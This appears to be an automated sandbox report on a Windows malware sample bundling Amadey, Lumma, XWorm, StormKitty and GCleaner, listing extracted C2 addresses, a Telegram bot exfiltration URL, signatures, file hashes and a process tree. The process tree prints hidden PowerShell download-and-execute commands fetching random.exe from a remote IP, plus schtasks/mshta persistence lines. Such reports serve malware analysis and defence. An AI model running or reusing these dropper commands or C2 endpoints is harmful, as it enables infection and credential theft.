Overview

overview

10

Static

static

5

4b6809eadf...13.exe

windows7-x64

10

4b6809eadf...13.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/03/2025, 06:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113.exe

  • Size

    938KB

  • MD5

    05fdff6b612497f1292bd7c12fd54d00

  • SHA1

    611df7ad895719e22ccdfc8068e7e93afd2c2b7b

  • SHA256

    4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113

  • SHA512

    3a522cb7aa14cbf32864b489c4c7c5ab700456ab90195dd927dcd3d08a30541f60941660a7d5252b5d57ec0f8dae4e90532e8d4e24b5443aa60db327697d73ac

  • SSDEEP

    24576:YqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:YTvC/MTQYxsWR7a06

Score
10/10
amadeygcleanerlummastormkittyxworm092155defense_evasiondiscoveryexecutionloaderpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

mCc32z4xar49VjIz

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7966191014:AAHmIi9PixWQP2mPV3M19pmD0gl2NMjcjIQ/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

lumma

C2

https://begindecafer.world/api

https://9garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://ksterpickced.digital/api

https://dawtastream.bet/api

https://foresctwhispers.top/api

https://tracnquilforest.life/api

https://xcollapimga.fun/api

https://strawpeasaen.fun/api

https://jquietswtreams.life/api

https://starrynsightsky.icu/api

https://earthsymphzony.today/api

https://zfurrycomp.top/api

https://garagedrootz.top/api

https://larisechairedd.shop/api

https://sterpickced.digital/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Xworm Payload 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 11 IoCs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113.exe
    "C:\Users\Admin\AppData\Local\Temp\4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn N0geema6qnL /tr "mshta C:\Users\Admin\AppData\Local\Temp\E6Tx48AwG.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn N0geema6qnL /tr "mshta C:\Users\Admin\AppData\Local\Temp\E6Tx48AwG.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4884
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\E6Tx48AwG.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3852
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CJBMLE7NMWQPKI3LMJPO4MDXIGPUEBB6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:392
        • C:\Users\Admin\AppData\Local\TempCJBMLE7NMWQPKI3LMJPO4MDXIGPUEBB6.EXE
          "C:\Users\Admin\AppData\Local\TempCJBMLE7NMWQPKI3LMJPO4MDXIGPUEBB6.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4260
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3036
            • C:\Users\Admin\AppData\Local\Temp\10136700101\8PSVPpr.exe
              "C:\Users\Admin\AppData\Local\Temp\10136700101\8PSVPpr.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3920
            • C:\Users\Admin\AppData\Local\Temp\10136710101\8PSVPpr.exe
              "C:\Users\Admin\AppData\Local\Temp\10136710101\8PSVPpr.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:5016
            • C:\Users\Admin\AppData\Local\Temp\10136720101\ad5d42979f.exe
              "C:\Users\Admin\AppData\Local\Temp\10136720101\ad5d42979f.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2760
            • C:\Users\Admin\AppData\Local\Temp\10136730101\96ded32a25.exe
              "C:\Users\Admin\AppData\Local\Temp\10136730101\96ded32a25.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:3524
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn CAluRmaerC8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\NkKUymTZB.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4012
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn CAluRmaerC8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\NkKUymTZB.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4356
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\NkKUymTZB.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4388
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JGPCEPWWTXXZ1DZZDDSYMYV8ELBPUSKR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1100
                  • C:\Users\Admin\AppData\Local\TempJGPCEPWWTXXZ1DZZDDSYMYV8ELBPUSKR.EXE
                    "C:\Users\Admin\AppData\Local\TempJGPCEPWWTXXZ1DZZDDSYMYV8ELBPUSKR.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3552
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10136740121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1816
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:4356
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1712
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2296
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:760
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3816
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:560
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:740
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "wnRvKmaDIpx" /tr "mshta \"C:\Temp\egCZvFOo2.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2604
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\egCZvFOo2.hta"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:4884
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2976
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3752
            • C:\Users\Admin\AppData\Local\Temp\10136750101\671f8ba606.exe
              "C:\Users\Admin\AppData\Local\Temp\10136750101\671f8ba606.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2996
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:1184
            • C:\Users\Admin\AppData\Local\Temp\10136760101\f8e16e10e4.exe
              "C:\Users\Admin\AppData\Local\Temp\10136760101\f8e16e10e4.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4248
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:968
            • C:\Users\Admin\AppData\Local\Temp\10136770101\256e6c9398.exe
              "C:\Users\Admin\AppData\Local\Temp\10136770101\256e6c9398.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1552
            • C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe
              "C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1196
              • C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe
                "C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:812
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 800
                7⤵
                • Program crash
                PID:3028
  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:1864
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1196 -ip 1196
    1⤵
      PID:2340
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:2752
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:3524

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Modify Registry

    1
    T1112

    Virtualization/Sandbox Evasion

    2
    T1497

    Credential Access

    Credentials from Password Stores

    1
    T1555

    Credentials from Web Browsers

    1
    T1555.003

    Unsecured Credentials

    3
    T1552

    Credentials In Files

    3
    T1552.001

    Discovery

    Browser Information Discovery

    1
    T1217

    Query Registry

    5
    T1012

    System Information Discovery

    3
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Virtualization/Sandbox Evasion

    2
    T1497

    Lateral Movement

    Collection

    Data from Local System

    3
    T1005

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Temp\egCZvFOo2.hta
      Filesize

      779B

      MD5

      39c8cd50176057af3728802964f92d49

      SHA1

      68fc10a10997d7ad00142fc0de393fe3500c8017

      SHA256

      f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

      SHA512

      cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      25604a2821749d30ca35877a7669dff9

      SHA1

      49c624275363c7b6768452db6868f8100aa967be

      SHA256

      7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

      SHA512

      206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VNL8ZX03\service[1].htm
      Filesize

      1B

      MD5

      cfcd208495d565ef66e7dff9f98764da

      SHA1

      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

      SHA256

      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

      SHA512

      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VNL8ZX03\soft[1]
      Filesize

      987KB

      MD5

      f49d1aaae28b92052e997480c504aa3b

      SHA1

      a422f6403847405cee6068f3394bb151d8591fb5

      SHA256

      81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

      SHA512

      41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      7acd08094fe2db26f02371584ba74ed2

      SHA1

      e5567848ee2412ad9e6e2f1126a3a8afd70c0589

      SHA256

      23928549e2942a18b2cb0d831de7399676fcdff65ff08c7f88ee1945c8a19f2d

      SHA512

      c9a41fd96f90229c51307ce5d6db03d79dc927473658c9dc5c88be4a657c791a97c2e4a98350f34fd6500c5181a4101cf7b1e3dc72823b072042e00bd7ad0de7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      4d711b6c23132bde38cd30a9c4b75984

      SHA1

      6915d0b5654c5c08508fccc995294980a5a9ec75

      SHA256

      d3402485cd3ee5598008490635c1ea324ad446e3d16ea3a30ebadab6ef6cc69e

      SHA512

      f2bd2fe88fe5fa8695061302fb50229b7541d19045428e02a27f122001c7d8c52030b9c4c1e66f08b166aa21ca045b2ed24898fcedd981180fdbf28863332531

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      17KB

      MD5

      067ecb3a0c886ff97b174ad6a3e6d84f

      SHA1

      805a5ef8e7ae23a1ddc60880c70fc80e226c5b13

      SHA256

      2eeae1911d9682bd9310d5643a689519ce70ef876e2eba4337765d399f2907d6

      SHA512

      af30dabdc89e91ab6e762e0a6c526a701c6a438db7c204f3f1b0c0b8b4fe13bdfc415b3cf807cc0c86ece7cbd066797f912a6dd58b8507da0694be2471dd0f32

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      17KB

      MD5

      751cfccc5f687b05b3cc72e168225124

      SHA1

      a516c411e99fe6529536ca0623ddff936b68698e

      SHA256

      ab750d4ca4c3cb44f79857bc825cd6166caa31ddfdf0aaeaf7c48d6d126c2713

      SHA512

      47ae0de66669ee7f2d4a74211c465cf5724beb582111ae4328bfbec9ad193ddb15ac62152b15c2dad87e34c7b144a2aeca42c4404ee23f9a0170baab07a122ac

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      17KB

      MD5

      514453a5411bcd084bf7229b21a084c8

      SHA1

      21122129dfa2e6a68e51988215f1c9300d35dbc1

      SHA256

      8b86d169b4f4c0d24251b423c58c627561aa90e2f0c7710f51ea55d7e0373797

      SHA512

      9e1535c4b467f55027535a5d0499b137dcdef20a190b43e766f156927ae16ab99006cbd8a584d0835ca3acd9504bb50d800c0ea015489552bf9ef64d22848687

      Download Submit

    • C:\Users\Admin\AppData\Local\TempCJBMLE7NMWQPKI3LMJPO4MDXIGPUEBB6.EXE
      Filesize

      1.9MB

      MD5

      997dfb98c1ced9c1dd09184542a55c4e

      SHA1

      ecd413c5638ee69c504691209eaff90a231ad1f1

      SHA256

      edd0944a6e3795af01734074651575e5e70218691e6c01c0f6c240a2582a416a

      SHA512

      3264f5248daad05c6f591da4292b5f7c8ed24dc3542f63983a3a5de8e89aac72531fb57fa19d0ff2d674494174ad3d3e4c4ac690b306f8fe6cadb508b0b94e42

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10136700101\8PSVPpr.exe
      Filesize

      206KB

      MD5

      161a7aadcaea3ec926f673f8aaca6bdd

      SHA1

      f599a713e7af8631b310c0ceb70f51599b101692

      SHA256

      75e0f5f7c05f393ce8e90db7b88bde00e7d2323e02e7bb0f0bd8f7df3afea726

      SHA512

      f24b737120c93ee258790c13f9487293c97cb24b33b347a5b84530c7784e2c7eb2be0e67721ef988007ac2914611eabb489888a1054968f3ff1e0e502b4c1ef5

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10136720101\ad5d42979f.exe
      Filesize

      2.9MB

      MD5

      a8de283bc6aa92aa304f25800c8f5d4b

      SHA1

      04dd62343ea6d852cfb22f872a6a7db7ba3c6dd2

      SHA256

      d7973b0a237cdca8cdcc8343fba8f123e8a2f119bf5839ad6914d2629c627a78

      SHA512

      272352908f2f748d2c21f578a63285cd9cf30b8747ee0caa4cd4565e4674027a872f863ed1f8d64b196bebfd49fe48ffb6c600a426d11339569c68f6da243543

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10136730101\96ded32a25.exe
      Filesize

      938KB

      MD5

      759c7df2729a11dc7221153aa97225e5

      SHA1

      d35dbd602bf8e033131d236133b6f90a6cc3c9b2

      SHA256

      74a844fa7a9fb28cdba19006a07f92823c3673134cf69c4713e10590ee05cec8

      SHA512

      0faa312dad58cecda4df569a69b32b20d40dfbf1248aeb607fd52672974cb740fa4ff1014489b6a52b11c71476a0bb2d985688535835180adb87583942fc9002

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10136740121\am_no.cmd
      Filesize

      1KB

      MD5

      cedac8d9ac1fbd8d4cfc76ebe20d37f9

      SHA1

      b0db8b540841091f32a91fd8b7abcd81d9632802

      SHA256

      5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

      SHA512

      ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10136750101\671f8ba606.exe
      Filesize

      3.8MB

      MD5

      a9cee07081907d6abd6f187bd1cfd388

      SHA1

      ab4dd2e23ebca1e4b6099b9021385088dc7893fc

      SHA256

      c6e5b5bb4b3d84d4df5e6eddca5e643f7be503768ff97929018650d958178e5f

      SHA512

      1a518bcbc2c58f5e215e3371e0a8ad2928d8c638eeef0aa76f0707c53bd0fc2db0649928f3c4c91f5c813a9134d6f8927bd667ec3f46040f898f45f56ad88562

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10136760101\f8e16e10e4.exe
      Filesize

      4.5MB

